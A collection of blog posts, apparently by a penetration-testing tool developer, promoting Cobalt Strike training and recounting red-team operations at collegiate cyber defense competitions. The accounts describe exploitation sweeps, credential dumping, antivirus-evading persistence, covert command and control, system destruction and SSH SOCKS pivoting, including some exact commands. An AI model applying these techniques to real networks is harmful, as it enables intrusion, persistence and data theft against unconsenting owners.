This coming weekend, I am teaching a free 4 hour workshop at the HackMiami Conference in beautiful Miami, FL. I’m told the venue can hold quite a large number of folks and I’m planning to bring enough materials for 100 attendees. Unlike other runs of this workshop, there is no pre-registration and no attendee list I can blast this message too. No problem with me, but there is some information you should know about before you show up.

This workshop has a significant lab component. To participate in the labs, you must bring a computer that meets the following requirements:

1. 2GB of RAM or greater
2. 12GB of free disk space
3. The ability to run VMWare Virtual Machines (one of VMWare Player, VMWare Workstation, or VMWare Fusion should be installed)
   

If you bring a system that meets those requirements, I will bring everything else. I will provide you with a DVD containing three virtual machines and a lab sheet. If your modern computer doesn’t have a DVD player, don’t sweat it. I will bring a USB DVD drive with me. You’ll have a chance to copy the needed files to your disk during the setup phase of the workshop. I left my USB DVD drive at another conference, but I promise to buy another one before Friday.

During the workshop, I expect that you will use the environment I provide. This means you do not need to worry about setting up Kali Linux or finding that old copy of Windows XP underneath the couch. I have you covered. If you want a preview of the workshop, here’s a video walk-through of the environment I will provide:

During the workshop, we will work through a slightly abridged version of the above labs (but you’ll have all of them, in case you want to play around later).

If you’d like to come to the workshop, it’s at this weekend’s HackMiami Conference. Attendance to the conference is $125. There is no other fee to attend this workshop. Also, since this is open to all attendees of HackMiami, my workshop is available on a first-come, first-serve basis.

The workshop starts at 5pm on Saturday in Track 1.

With this in mind, Jim and David invited me back to demo Cobalt Strike in its current state. We did this entire interview and demonstration over Amazon’s EC2, attacking parts of my local training lab. Here it is, in all of its glory:

See releasenotes.txt for the full list of changes.

Licensed Cobalt Strike users may grab the latest using the built-in update program. A 21-day trial is available too.

Our relationship has evolved, to the point where they advise on Cobalt Strike, teach the product, and Veris Group is also a Cobalt Strike customer.

At BlackHat USA, Veris Group will teach two courses: Adaptive Penetration Testing and Adaptive Red Team Tactics. These two offerings grew out of their Adaptive Penetration Testing course which they’ve taught at BlackHat USA the past few years.

Last year, David and Jason approached me and offered to include Cobalt Strike on the DVD they provide to the students of their course. This then evolved to including a lab with Cobalt Strike. Which then evolved to them opting to use Cobalt Strike as the platform to demonstrate their Adaptive Penetration Testing process.

I have my own course offerings, but my offerings are focused only on my toolset. These courses will give you the foundation to setup a complete red team and penetration testing assessment process using Cobalt Strike and other tools. Their perspective is available once a year at BlackHat USA, I highly recommend that you take advantage of it.

To give you some more insight into these courses, I’d like to share an interview I conducted with Jason and David on their BlackHat courses:

1. How many times have you taught at Black Hat and what made you want to teach there?

David and Jason: We’ve had the opportunity to teach the class twice at Black Hat USA and once at Black Hat UAE. Black Hat provides smaller independent trainers like us, who don’t do this full time, with a great venue to reach a broad potential audience. They handle all the logistical work (such as securing a venue, billing and marketing) so we can focus on delivering quality course material that benefits our students. We are very appreciative of the opportunity they give small trainers and the working relationship we’ve been able to establish.

2. In your words, what are the differences between the Adaptive Penetration Testing and Adaptive Red Team Tactics courses?

David and Jason: The focus of Adaptive Penetration Testing (APT) is to provide students with a framework for providing comprehensive assessments with the objective of demonstrating the risk, in terms of business impact, of potential system breeches. The end goal is for students to be able to take the techniques, procedures, and methodologies we have developed through our experience and implement them in their own operational environments. Assessments utilizing the methodology we discuss in APT are targeted to take one to two weeks to execute effectively.

Adaptive Red Team Tactics (ARTT) is meant as a follow on to APT and focuses on emulating a more advanced threat. This course covers more advanced tactics, techniques and procedures (TTPs) that enable our students to provide a more realistic assessment of defense, detection, and response capabilities in organizations with mature IT security programs. Red Team assessments generally have an extended assessment window and incorporate techniques for providing a more covert, “low and slow,” assessment with a heavy focus on intelligence gather and long term post-exploitation activities. Stealth, evasion, robust persistence, and data exfiltration are some of the main themes of ARTT.

3. What is the secret sauce of your courses? What will you teach that students can’t get elsewhere?

David and Jason: We focus heavily on the tools, techniques and methodologies that we have developed through our experience performing assessments and building internal penetration testing programs for our customers. While we thought there was some really great training out there, we felt there was an opportunity for us to fill a legitimate need in the industry by offering training that focuses on how to effectively conduct assessments in operational environments. In our courses, we want to make sure students understand the entire process of executing a Penetration Test or Red Team assessment, including everything from scoping to exploiting systems to delivering a comprehensive report.  We structure and deliver our course material so students walk away from the course with something they can easily use as a reference when conducting their own assessments. We also include templates and other material that offer students a foundation for creating a program/service from the ground up.

We think another big differentiator in our courses is our incorporation of Cobalt Strike. We feel that one of the gaps in a lot of training out there is that they do not effectively cover the professional tools that can assist in delivering efficient, effective, and repeatable assessments. Cobalt Strike is a full-fledged toolset we use every day in our penetration tests and red team assessments. It enables us to save a lot of time in execution and have quick access to some powerful capabilities. We believe that when testers are in the middle of an assessment, they should be able to focus on assessing the risk/business impact of breeches for their customer, not wrestling with their tools. Tools don’t make the tester, but knowing which tools can best augment your capabilities is often as important as knowledge of great penetration testing techniques.

Raphael: *cough* *cough* Last year, I spent some time with David and Jason at the Veris Group headquarters. Jason constantly rolled his eyes at David and I. Apparently, when we sit down together, we’re like two Furbies going into an infinite loop. Once we broke out of our chat routine, I sat down to go through their labs. I couldn’t do them. David and Jason kept providing hints, but I really did not know. The labs were related to lateral movement and abusing trust relationships. This is a topic that I don’t feel is well covered in other places and their courses both address this topic with a lot of depth.

4. Why isn’t this material taught in other places?

David and Jason: Many courses seem to focus either on foundational knowledge of penetration testing, or technical intricacies of various advanced techniques. While a lot of these are really great courses, we felt they often didn’t leave students with the ability to go execute well-planned and comprehensive assessments on their own. We designed APT for students who don’t need more foundational knowledge, but do need to run effective assessments to add value for their customers. Many course also focus on tools and techniques that are freely available, but operational penetration testing teams use the most effective tools for the job, whether freely available or commercial. We wanted to train on tools and techniques that students would actually use in the field.

When it comes to ARTT, we felt there are few advanced penetration testing courses available, especially relative to the number of courses that teach the fundamentals. Those that are available typically focus on techniques such as exploit development, but few seem to focus on emulating the techniques of the advanced threats that are actually targeting organizations today. We bring our experience in conducting red team assessments for the Federal government, where the objective is to analyze systems the way an adversary would versus utilizing the latest and greatest exoteric technique.

5. How did Cobalt Strike end up in your courses?

David and Jason: When we first developed the APT course, we faced the same limitations most courses do in many of the tools we were teaching weren’t the ones we actually used on assessments. One of the only tools that came close to something we could use operationally was Armitage. As Cobalt Strike was a natural progression from Armitage, when it was released, we found it was the perfect fit to move to for our primary penetration testing platform. In keeping with our objective of training for operational testing, we also thought this was a great opportunity to showcase the capabilities a professional toolset can provide. We found Raphael had much of the same mindset for penetration testing and training we did and was enthusiastic about assisting us in improving our training offering. Cobalt Strike was exactly what the course intended to provide, a turn-key approach to accomplish common, sometimes tedious, tasks so the assessor can spend more time performing effective threat emulation.

Way to sell them on buying Cobalt Strike guys — Raphael

Cobalt Strike was actually one of the primary reasons we were able to offer the ARTT course this year. One of the significant barriers to teaching (and conducting) red team assessments is the specialized toolsets red teams use. These toolsets are generally highly specialized, require a significant amount of support, and are almost never released. These issues make training red team tactics much more difficult. However, over the past year Raphael added many red team capabilities to Cobalt Strike. While Cobalt Strike is great for enabling a standard penetration testing team to emulate more advanced threats, it also gave us the opportunity to train on many of the more advanced tactics we use in our red team assessments.

Raphael: I know the real story. A few years ago, David and Jason were teaching Adaptive Penetration Testing. One of their students used Armitage to chewed through their entire exercise environment, like it was nothing (this is a very common Armitage story–in many classrooms). This is what got their attention and it’s part of what got us talking in the first place.

6. Who should take your courses?

David and Jason:

• Penetration testers and/or managers with prior knowledge/training/experience who are looking to maximize their programs
• Individuals interested in starting a penetration testing capabilities
• Penetration testers and/or managers with prior knowledge and experience with penetration testing tools and techniques interested in emulating a more sophisticated threat capability
• Individuals who would like a better understanding of the tactics, techniques and procedures of more advanced adversaries

Raphael: If you’re a prospective (or active) Cobalt Strike user, I highly recommend signing up for one of these courses. If you’re planning to use Cobalt Strike in a variety of engagements, take Adaptive Penetration Testing. If you’re primarily focused on threat emulation and red teaming, take Adaptive Red Team Tactics. David and Jason are very experienced in the subject matter they’re teaching. They know Cobalt Strike and we view threat emulation and penetration testing through the same lens.

2013 was the first year I had an opportunity to exercise Cobalt Strike and its capabilities at these events. CCDC exercises don’t offer a client-side attack surface, which takes some Cobalt Strike features out of play. However, it’s collaboration capabilities, Cortana scripting, Beacon agent, and the ability to manage multiple team servers are all very relevant to a CCDC red team.

I wrote about my experiences at the Western Regional Collegiate Cyber Defense Competition, now I’d like to share what happened on the National CCDC Red Team.

I showed up to San Antonio, TX exhausted. I spent last week participating in two exercises. The Mid Atlantic CCDC event and another grueling (but very challenging and fun) exercise. Once I got to San Antonio, I had dinner with my fellow red team members and I crashed out. I made it to the red team room at about 9:15am, approximately 45 minutes before go time.

This was my second year on the National CCDC Red Team. The National CCDC Red Team operates differently from the regionals. Where regionals are generally a free for all, the National team assigns two red team members to each blue team. We’re allowed to perform actions against other teams, but we must focus on our assigned team first, and we must not disrupt or step on the red team members who own that particular blue team.

When I described this model to my girlfriend, she immediately objected and stated–”that’s not fair! what happens if one team gets less skilled people assigned to them”. Hear me out, this model can work, and during the 2013 National CCDC–we provided the fairest and most balanced red experience I’ve seen at a CCDC event yet.

Preparation

I spent the 45 minutes before the event getting my initial attack kit prepped. One role I usually fill at CCDC events is the role of initial exploitation and persistence. The Red Team was assigned several IP address ranges. Our team captain, David Cowen, parceled them out by assigning each red team member with a range of addresses they could bind in the last octet of all the ranges.

Once I knew my addresses, I loaded a Cortana script that allows me to generate my persistence artifacts with the appropriate addresses. At CCDC, student teams are allowed to install anti-virus. Unfortunately, most artifacts generated by the Metasploit Framework are caught by anti-virus. I didn’t want to make it that easy to clean us out. So, I opted to write a persistent stager for the CCDC events this year. This stager ships with several addresses embedded to it. Once it is run, it will attempt to connect to each of these addresses, one per minute, until it successfully downloads the second stage of my malware and injects it in to memory. Because this code is not in use elsewhere, no anti-virus product that I’d have to worry about at CCDC catches it.

Seriously, this won’t do you that much good.

Pro-tip: if you found any of my persistence mechanisms and ran strings against it, you would have known my staging addresses and could have blocked them. If you blocked them, you would have blocked my other backdoors that attempted to stage through the same address.

Anyways, I generated my artifacts, before I even had time to bind all of my IP addresses. I setup a local Cobalt Strike instance for the initial attack and I was getting ready to setup a team server when very suddenly, 10am came and Dave shouted “go! go! go!”.

Opening Salvo

The first minutes of any CCDC event are critical. As a red cell member, I do not see CCDC as a game of patching, installing firewalls, and thwarting an attacker who is attempting to scan and exploit you. I see CCDC as an intrusion detection and response game. I want the students to work under the assumption that an attacker is present, focus on their operational security, and develop creative ways to dig us out, spot our activity, or disrupt our command and control. Truth is, once they patch and setup a firewall–if we don’t have access, we’re likely not going to get it. Intrusions today start with the end user for a reason–these other layers of defense stop the easy stuff.

Contrary to popular belief, I no longer script my opening attack. I’ve moved away from it this year. I found at earlier events that my scripted exploitation would sometimes make assumptions that I would need to correct once I understood reality. The Armitage and Cobalt Strike user interfaces are efficient enough to allow me to think on my feet and simultaneously apply an action against all systems–very quickly.

I start most CCDC events with a db_nmap sweep. I don’t care about discovering each open service. I want the low hanging fruit only. I use nmap -sV -O -T4 --min-hostgroup 96 -p 22,445 across all student ranges to discover the easy exploitation opportunities as quickly as possible.

At National CCDC, student teams have two networks: a local network and a cloud network. This year, I opted to go after their local networks first and follow up against their cloud networks second.

Once a scan comes back, I sort my host display by the operating system icon. I simply highlight all Windows systems and launch the ms08_067_netapi module against them. This year, due to a bar on Mubix’s worm, we were given a list of potential default passwords–for the first time in National CCDC history. I used this information to execute psexec against all of the remaining Windows hosts. If I did not have the default credentials, I would use a Cortana script to run Windows Credential Editor to get them.

As Windows sessions came in, I had a Cortana script loaded that would automatically install my beachhead executable onto the systems. The persistence mechanics were nothing new. They were very similar to last year’s Dirty Red Team Tricks talk. The beachhead executable’s only purpose was to connect to me, download Beacon, and inject it into memory.

Once I had the Windows systems, I ran the Metasploit Framework’s ssh_login module against all of the UNIX systems with root and each of the suspect default credentials. Armitage and Cobalt Strike tip–hold Shift as you click Launch to run a module but keep the dialog open. This makes it really easy to try multiple variations of an attack very quickly.

Checking out those SSH keys

Once again, I had a Cortana script loaded to automatically install some persistence on the UNIX systems. I didn’t do much to the UNIX systems at National CCDC because I did not want to step on my other red team members. I simply dropped an SSH key for root and altered the SSH configuration to allow the one key to work for any user on the system.

Team Server

After the opening salvo, I successfully exploited the Windows systems with port 445 open in the competition environment and I had root access to the UNIX systems with SSH open (except for the Solaris systems assigned to each team). This whole process took 1 to 2 minutes total. In theory, I had backdoors on each of these systems too, but I had no way to know because I had not yet setup a team server.

I went to work to setup a Cobalt Strike team server. Of the four staging addresses I created, I only bound one of them. Once Cobalt Strike was up, I connected my client to this team server and I setup the Beacon listener and gave it a different list of IP addresses to beacon back to.

Beacon is a Cobalt Strike-specific payload. It doesn’t require a persistent connection to the target, rather it phones home every so often to request tasks to execute. I created Beacon to act as a quiet (in memory) persistence agent. The idea is you can use it to spawn a new Meterpreter session when it’s needed. In a pinch, Beacon can also act as a remote administration tool if your Meterpreter traffic is squashed by network defenses.

Beacon — give me shell!

Once the listener was up, I noticed my Beacons were coming back and I was able to verify that we had all Windows systems in the competition environment at that time. This really allowed us to give students a fair game. Each team was owned, from the beginning, with the same backdoors.

Cobalt Strike Use

I then spent time getting folks, who asked for it, setup with Cobalt Strike so they could task their own Beacons. Several tools were in play on the National CCDC Red Team. I saw msfgui, msfconsole, Core Impact, Dark Comet, and Cobalt Strike. There was some Armitage too early on, but I showed those folks how they could connect Cobalt Strike to multiple Metasploit Framework instances at once and that did away with that.

8 out of 10 blue teams had at least one red team member using Cobalt Strike to conduct post-exploitation and gain more access into their network. By my count, 15 out of 20 red cell members were using Cobalt Strike. 12 of the 20 red team members used only Cobalt Strike–primarily through the local team server without any other penetration testing platform in use. In effect, 8 simultaneous engagements were happening through one team server. Wow!

The workspaces feature helped a lot with this. Each Cobalt Strike user was able to define a workspace that showed them only the hosts, services, and sessions for their team.

Collaborative hacking… at its finest

As a developer, nothing excites me more than seeing someone use a tool I wrote. I’m very honored that so many well respected professionals in this field gave Cobalt Strike’s toolset a try during the National CCDC event.

Other Tools

Some custom stuff was in use during National CCDC. We had a custom Linux backdoor, something that works a lot like Beacon deployed to student systems. We also used Dark Comet to further fortify our access to student systems once the initial salvo was complete. Individually, a few red team members chose to deploy different RATs against their specific team, but I’m not aware of anything else that was done on an all teams basis.

We were also using a data management system developed by Alex Levinson, Maus, and Vyrus to keep track of shared information and automatically track red activity, based on a Metasploit Framework instrumentation plugin. My favorite part of the whole system–it integrates etherpad and I’m in love with etherpad for red team information sharing. It’s much better than a wiki.

Tempo

Once we were in, post-exploitation was up to each individual cell. Knowing that we had equal access and persistence across all teams, I greatly enjoyed the opportunity to focus on one team. The first day, our job as the red team was to stay in and quietly steal data. We were under strict instructions to not do anything that might reveal our presence. I spent the first day setting up keystroke loggers, downloading interesting files, taking screenshots, and occasionally sweeping the network to try to get access to other hosts that the initial salvo didn’t give us.

Windows Credential Editor is my co-pilot

At the start of day 2, we still had access on Windows systems on all team’s cloud networks. We also had access to at least one box on most of the team’s local networks. Some systems were beaconing to our local team server, a few were beaconing over DNS to a node in Amazon’s elastic computing cloud. The National CCDC event required teams to configure a proxy on each Windows system for it to connect to the internet. This didn’t happen on all systems, limiting my external Beacons. The second pool of accesses was still helpful in some cases though.

On day two, our team captain started blasting some classical music and instructing us to burn all of our boxes. The idea–get in on day 1, stay there, let the students snapshot their virtual machines with our backdoors, let them trust their snapshots, and on day 2–destroy their systems. We bounced systems for the first few hours of the day. We would jump on, destroy it, the students would restore it, our beacons would phone home, we’d request a meterpreter session, and then we’d destroy the system again.

blue team: nooooo red team: yes yes yes

<in a run window> me:Noooooooooooo RedTeam:yes yes yes yes. #nccdc #blueteamprobs @armitagehacker http://t.co/PDNJCap15t

—
Corey Hadley (@hadley1210) April 21, 2013

This happened all throughout the morning. As a person who likes to keep access until the end, this was scary. Students were put into a catch-22 situation. They could revert to a snapshot with all of the work they did to the system + our backdoors or they could revert to a clean image. By the end of the morning, many teams opted to revert to the clean image.

We were able to re-exploit systems hosted in the student’s cloud networks when they were reverted to a clean image and rebackdoor them. That part was pretty easy. As the day went on, one red cell member might make a discovery and call everyone else’s attention to it. We would then work on replicating that discovery in our environment.

For example, Matt Weeks discovered a webshell pre-implanted by the competition organizers on an internal system. All of us found the webshell on our teams and went to work through it. In the default configuration, this webshell existed on Windows systems giving us access to internal networks for some of the teams. By this time, access to internal networks was a nice find. We bounced student systems so many times, that the teams reverted to a clean snapshot for their internal systems.

My team had migrated their web server from Windows to Ubuntu Linux. Fortunately, they kept the webshell with the migrated site giving us access to that system as well.

Each red team member had a good understanding of the point system. We knew, for example, that a root/administrator level intrusion counted once and only once per unique attack vector. There was no point in exploiting systems time and again with the same thing.

We also knew that credit cards and other data flags were worth points.

One of the biggest hits we could make a team take came from publishing credit card information to their website for the whole world to see. We made sure to make this happen for all teams, where it was possible.

Overall, the plan worked. We didn’t achieve Dave’s life long dream of seeing every team down for every service across the board. But, we were very well organized, we collaborated, and this year we gave the students at the National CCDC event the fairest and most balanced red experience yet.

Congratulations to RIT on its first National CCDC win. Congratulations to Dakota State University on a very close second place finish.

See also:

• David Cowen’s NCCDC Wrapup (with out-brief slides)
• Alex Levinson’s Feedback to the Students
• David Cowen’s NCCDC Lessons Learned
• Jim Walter’s NCCDC 2013 Recap

At the end of the National CCDC event, our team captain announced that if we have access, we’re wrong… burn it! So, in a maniacal way, all of us jumped on sessions and destroyed system after system. All well and good, this is standard operating procedure for most exercise red teams… at the very end of an event.

In our maniacal zeal to take these actions, we sometimes make mistakes, it happens.

Anyways, let me relay a little factoid.

The Metasploit Framework has a console. Any input the console does not understand is immediately passed to the operating system, for your convenience. This input is run and its output is presented to you, the user. In classes, I’ve seen many people think they have shell when they type whoami in a Metasploit Console and learn that they’re root. They’re root, but it’s on their own system.

So, in the zeal at the end of the National CCDC event, someone issued an rm -rf / command to my team server. I lost data that would later become a large generated report I could provide to the teams (next year!). I’m not too worried about that. I wanted to speak to the safety lesson, one I discovered later.

I told VMWare to share folders with my host operating system. Fortunately, I was sharing just a dropbox folder with several tools that I keep around. I have  a backup of all this stuff, no big deal.

These folders were gone!

If I had shared my home folder… oh boy!  That was a close call, pretty funny since no harm came of it. Pretty scary otherwise.

If you’re going to host infrastructure for an event, do it on a separate server. If you’re crazy enough to use your laptop, like I am, make sure there’s isolation between your virtual machine and your operating system.

The reason given is that Rapid7 does not want to confuse users about which products they do and do not support.

When I released Armitage in November 2010, I had one simple goal–release something that would get into BackTrack Linux. I didn’t expect that it would make it into the Metasploit Framework. I even had a license scheme that prohibited it (GPLv2). HD Moore approached me and asked me to change my license to BSD. If I agreed to change my license, HD would ship Armitage with the Metasploit Framework. I never expected this and I always saw this distribution as a privilege, not a right.

Thank you HD and Rapid7 for making Armitage part of the Metasploit Framework for the past two years.

For the thousands of Armitage hackers out there, I’d like to clarify how this affects you. The short answer… this isn’t a big deal.

• I maintain Armitage and will continue to do so. I average one release every six weeks or so. In fact, I pushed a release yesterday.
• I do not have an automated update process for Armitage. You’ll have to download it from its homepage. You can signup to get an email notification when a new Armitage update is available.
• Armitage still works out of the box with a properly installed Metasploit environment. If you have Metasploit Community Edition setup, you can download Armitage, extract it, and run it. It will work like it always has.
• You can use Armitage with Kali Linux as well.
• If you’d like to support my work, Cobalt Strike is the way to do it. Check that it supports your needs first (I’m a value in exchange for value kind of hacker). If Cobalt Strike isn’t for you, but you still love Armitage, a simple thank you is good too.

The Armitage homepage is still http://www.fastandeasyhacking.com/

Here are a few of the exercise-inspired changes that made it into this release:

• The VNC Viewer in Cobalt Strike now starts out view only. Untoggle the spy button to take control of the user’s desktop. — I’m having a lot of fun with VNC at these various exercises, but unfortunately I keep giving myself away by accidentally moving a student’s mouse. This change will ensure that I’m only moving a cursor when I want to.
• Added a spawnto command to Beacon. This command forces Beacon to use the specified program to spawn shellcode into. — Pro-tip for RAT Developers: if you inject shellcode into the current process, you risk losing your access if the shellcode crashes the process. To get around this, Beacon spawns shellcode into a notepad.exe instance. I use notepad.exe because its location is reliable. Unfortunately, the world is getting wise to dirty hacker tricks, such as connecting to the internet from notepad.exe. With this change, you can have Beacon spawn shellcode into something else on the user’s system (e.g., Internet Explorer).
• The event log now shows the date next to the time associated with each message. Cobalt Strike also highlights messages that mention your nickname.
• After Western Regional CCDC, I tried to generate a report from the four team servers I was connected to. The merged report wasn’t up to my standards. Most fields weren’t sorted, credentials weren’t merged across servers, and several other details were out of whack. Instead of one report, I generated four (one from each server) and used the reports to give students feedback. For this update, I went through the various data merging issues and corrected them. Next event, it’s my hope to generate one report that tells the full story.

I’ve also added installation instructions for Kali Linux. The full list of changes is in the Cobalt Strike Release Notes file. Licensed users may run the update program to get the latest. A 21-day trial of Cobalt Strike is also available.

* . . . . o o o o o
*               _____      o       _______
*      ____====  ]OO|_n_n__][.     |lamer|
*     [________]_|__|________)<    |ville|
*      oo    oo  'oo OOOO-| oo\\_   ~~~|~~~
*  +--+--+--+--+--+--+--+--+--+--+--+--+--+

The scenario was interesting. Students were put in charge of a Computer Crime Defense Center. Part of their job involved protecting a repository of computer viruses.

Blue teams were given a 2-hour head start to secure their systems and change passwords. I was a little worried about this, but this worry was unfounded. The WRCCDC Black Team is far more evil than any red team I have ever seen. Students had to cope with a very strange network which included things like kill yelling at them for not saying the magic word, gratuitous appearances of ASCIIQuarium, and systems named in very confusing ways. Imagine my surprise when a UNIX box I quickly backdoored called home as winxp. Yeah…

Everyone loves pwnies

a248.e.akamai.net/camo.github.co… github.com/erkin/ponysay #wrccdc More black team fun...

—
James Schneider (@disturbedmime) March 30, 2013

The Low Hanging Fruit

Once the waiting period was over, we sat down at our systems and prepared to “facilitate” a learning experience. The first hint that we started was Vyrus’s music blasting through the convention center.

They say Apple is evil. #macbook #wrccdc #redteam http://t.co/wm2jwXq2Th

—
WRCCDC (@wrccdc) March 29, 2013

It took us a few minutes to get going. Apparently ICMP was not passing through from our space to the teams. So we had to resort to finding systems by looking for open services. I started with a quick sweep for port 22 and 445 with the Metasploit Framework’s ssh_version and smb_version modules. I focused on one team space at a time, to allow myself to learn the layout of the competition environment without waiting forever.

It didn’t take long to discover a few Windows 2003 systems. Even after a 2-hour delay, these were pretty easy to sweep with ms08_067_netapi. Stopping access to port 445 with a host-based firewall would have easily defeated this.

Once I had access to a few Windows systems, Windows Credential Editor helped me get ahold of the default password: Opensolaris1. A few of us discovered and pasted this credential to IRC at about the same time.

Output of a Cortana script that runs Windows Credential Editor.

I had a Cortana script ready to persist like crazy on the Windows systems. I’m not giving away my full kit for this year, yet… but it’s spiritually similar to last year’s kit. I also made a special effort to drop files to disk that anti-virus does not catch at this time.

I was able to verify that persistence worked by viewing the Beacons on the three Cobalt Strike team servers I had up. Cobalt Strike’s Beacon is an asynchronous post-exploitation agent. It doesn’t maintain a persistent connection to me, rather it periodically calls home to request the tasks that it should run.

Once I had default credentials, my next step was to attempt to login to all UNIX systems over SSH and to sweep all other Windows systems (with port 445 open) with psexec.

Maus owned a healthy number of UNIX machines too. *pHEAR*

Even 2-hours in, the default credentials bore a lot of fruit. They allowed us to lay down some persistence on the UNIX systems and to capture a Windows 2012 server system from one team.

Taking Points

The red team is able to affect blue team scores in three ways. Gaining access to a host takes away points. Stealing certain data flags takes away points. We’re also able to disrupt services or deface websites, which takes away points because the teams will fail service checks.

Ahh Rick Astley, you're never gonna give me up. #wrccdc http://t.co/YYb7NalviO

—
uosןᴚɐɔ ןǝɐɥɔıɯ (@blainecarlson) March 30, 2013

Managing Persistence

I spent most of my time during the competition managing Beacons across multiple servers. I would task Beacons to spawn sessions to one of the team servers my red team compatriots were connected to. The idea is this, if a blue team member sees notepad.exe connecting to an IP address, they may squash that connection and block that IP address, but so long as they don’t discover the Beacons, they can’t keep us out.

netstat -nab is a tool to help you discover rogue notepad.exe instances connecting to the internet

Sometimes, we’d get access to a Windows system that we did not have before. This may be because the team’s system or network was down during  our earlier exploiting frenzy. When this happened, I’d help whoever gained access to the system pass it to me, so I could install persistence on it. This system would now be available for anyone connected to the team server to abuse or pivot through.

Sometimes, I’d fight to protect our persistence:

Later in the event, the two lead teams had creative egress filtering and routing in place. I spent my time trying to understand, through trial and error, what they would and wouldn’t allow. Eventually, I ended up having to task Beacon to send reverse https sessions to a team server located in Amazon’s EC2. This gave the folks interested in dealing with these teams the opportunity to do so.

Special Attention

Friday, before dinner, I opted to give each team special attention. My goal was to loop through each team, one at a time, understand their networks, understand what changed, and find the low hanging fruit I could grab and persist on again. I didn’t want to miss easy access opportunities from being too busy.

I started with team 13 and tasked any beacons I had calling home to give me a session. Once I had my sessions, I ran Windows Credential Editor again to get any plaintext passwords. I also dumped password hashes and gave them a quick pass through John the Ripper.

I then setup a pivot through a Windows system, discovered live hosts with an ARP scan, and used several Metasploit Framework modules to discover the open services.

If I didn’t have access to a Windows host for a team, I would try to work from a Linux system. Conveniently, the competition black team had a Raspberry Pi device installed on each team’s network. It was taped under a table and connected directly to their switch. These devices had default credentials and NMap. In several cases, I was able to use the Raspberry Pi to run NMap against a team and import the results into Cobalt Strike.

In the few cases that we didn’t have access to any systems (one team adopted a strategy of staying down the entire event!), I would run NMap from a non-team server system and import the results into Cobalt Strike.

Once I understood which services the team had open, I would then attempt all known credentials against their Windows and UNIX hosts. If a Windows 2003 system was not hooked, I would use the trusty ms08_067_netapi exploit again. I should state–ms08_067_netapi is the only memory corruption exploit I used during this event.

Ok, I’m not going to be re-exploiting this box anytime soon. Oh well

During this step of the game, I got lucky as several blue teams opted to use the same password on different systems. This reused password allowed me to get access to and persist on their Windows 2012 systems.

Checking a few choice file locations yielded access to other assets as well:

Shenanigans

The Western Regional CCDC  Red Team had some crazy scary talent. Alex Levinson spent a lot of time administering forums for the blue teams. Alex, Vyrus, and Maus also built a system to track our accesses, credentials, and report our activity to the competition judges. This was a big help and we were able to pilot some ways to have the Metasploit Framework feed data to this system, automagically.

Our #wrccdc red team including @armitagehacker @theKos @michaelmcg19 @jrozner @vyrus001 @alexlevinson http://t.co/fU8OUIJwMu

—
WRCCDC (@wrccdc) March 31, 2013

Kos took over the X desktop for two teams and gave them full screen VNC access to each other.

Team 3, say hello to the full screen VNC session of Team 5s desktop. nowkiss.jpg #wrccdc

—
Kos (@theKos) March 30, 2013

I also heard of minecraft servers getting setup on blue team systems. An important way to provide red team with a break.

Is that another minecraft servers I see running on #blueteam servers at #wrccdc? http://t.co/F2CINfnrJX

—
uosןᴚɐɔ ןǝɐɥɔıɯ (@blainecarlson) March 30, 2013

I spent some time poisoning hosts entries on student systems to prevent them from getting to their inject scoring engine site, google, and others.

A lot of pretty funny pranks came from the red team. I wish I was able to keep up with all of it and detail it to you here. Despite this shortcoming, I hope this perspective helped shed some light on the red team activity that took place over the weekend.

#wrccdc top three teams, thanks for another great year http://t.co/QEvOHFzWT4

—
Patrick O'Connor (@patrickoconnor) March 31, 2013

Congratulations to our 2013 #WRCCDC Winners! 3rd: CSU: San Bernardino, 2nd: UC Berkeley, and 1st: Cal-Poly Pomona fb.me/xeptxEkg

—
WRCCDC (@wrccdc) April 01, 2013

One last note to close with, like any effective team, we specialize. Our red team had an infrastructure specialist, folks going after web applications, some going after access via other means, and still others handling post-exploitation on Windows and UNIX. There really was a lot happening.

ssh -D 1234 msfadmin@whatever.host

What you may not know, is that it’s possible to send your Metasploit Framework exploits through this SSH session. To do so, just set the Proxies option. It’s an Advanced option, so you will need to check the Show Advanced Options box in Armitage. The syntax is:

socks4:[host]:[port]

To send an attack through this SSH session, I would set Proxies to socks4:127.0.0.1:1234.

This came in hand at the North East Collegiate Cyber Defense Competition. We were able to get onto a student network through one Linux host. This Linux host could see another Linux host on the same network. Through this second Linux host, we were able to touch the team’s domain controller. We had cracked several credentials earlier. Our last task was to verify if any of them worked through the domain controller. We fixed the team’s DNS server and installed smbclient. Once we discovered one of our accounts could read the ADMIN$ share, we used ssh -D 8080 to get to the first server. We setup proxychains to go through this SOCKS host. We then used ssh -D 8081 to connect to the second server. From that point, we were able to point Proxies to socks4:127.0.0.1:8081 to psexec and executable to the domain controller. This executable delivered Cobalt Strike’s Beacon, which gave us some post-exploitation capabilities. We held that domain controller for the rest of the event.

If you ever need to pivot an attack through an SSH session, the Proxies option will come in handy.